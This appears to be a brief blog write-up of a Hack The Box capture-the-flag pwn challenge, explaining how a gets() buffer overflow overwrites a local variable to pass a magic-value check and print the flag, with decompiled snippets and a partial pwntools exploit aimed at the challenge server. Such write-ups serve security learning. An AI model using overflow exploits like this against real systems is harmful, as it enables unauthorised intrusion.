# Getting Started

This challenge is pretty easy but I just thought I’d explain it in a blog post real quick since I started doing some of the HTB pwn challenges.

# Reverse Engineering

The challenge itself is just a simple gets() buffer overflow. As you can see in the code below, it takes our name via a gets() call.

printf("Hello, good sir!\nMay I have your name? ");
gets(input_buffer);
printf("Hello %s, hope you have a good day!\n",input_buffer);


If we check in Ghidra, the size of the input_buffer is only 44 bytes, but there’s no length check, so we can just slam a large value in it.

char input_buffer [44];


However, there is small check;

  if (dead_code == 0x1337bab3) {
flag_buffer = malloc(0x100);
flag = open("flag.txt",0);
printf("Pleased to make your acquaintance. Here\'s a small gift: %s\n",flag_buffer);
close(flag);
}
return 0;


As you can see, if we can pass this check, it is going to read the flag into a buffer created by malloc(). However, at the start of the function the variable dead_code is actually defined as dead_code = -0x21523f2d. Not to worry, we can just replace it with our gets() overflow.

# Exploit

#!/usr/bin/python3
from pwn import *

def main():
p = remote("138.68.155.238", 32483)

payload  = b'A' * 60

So here we are going to send 60 As, followed by 0x1337BAB3 in order to pass the check, since we have a buffer overflow via gets() we’ll pass the check and the flag will get printed, easy.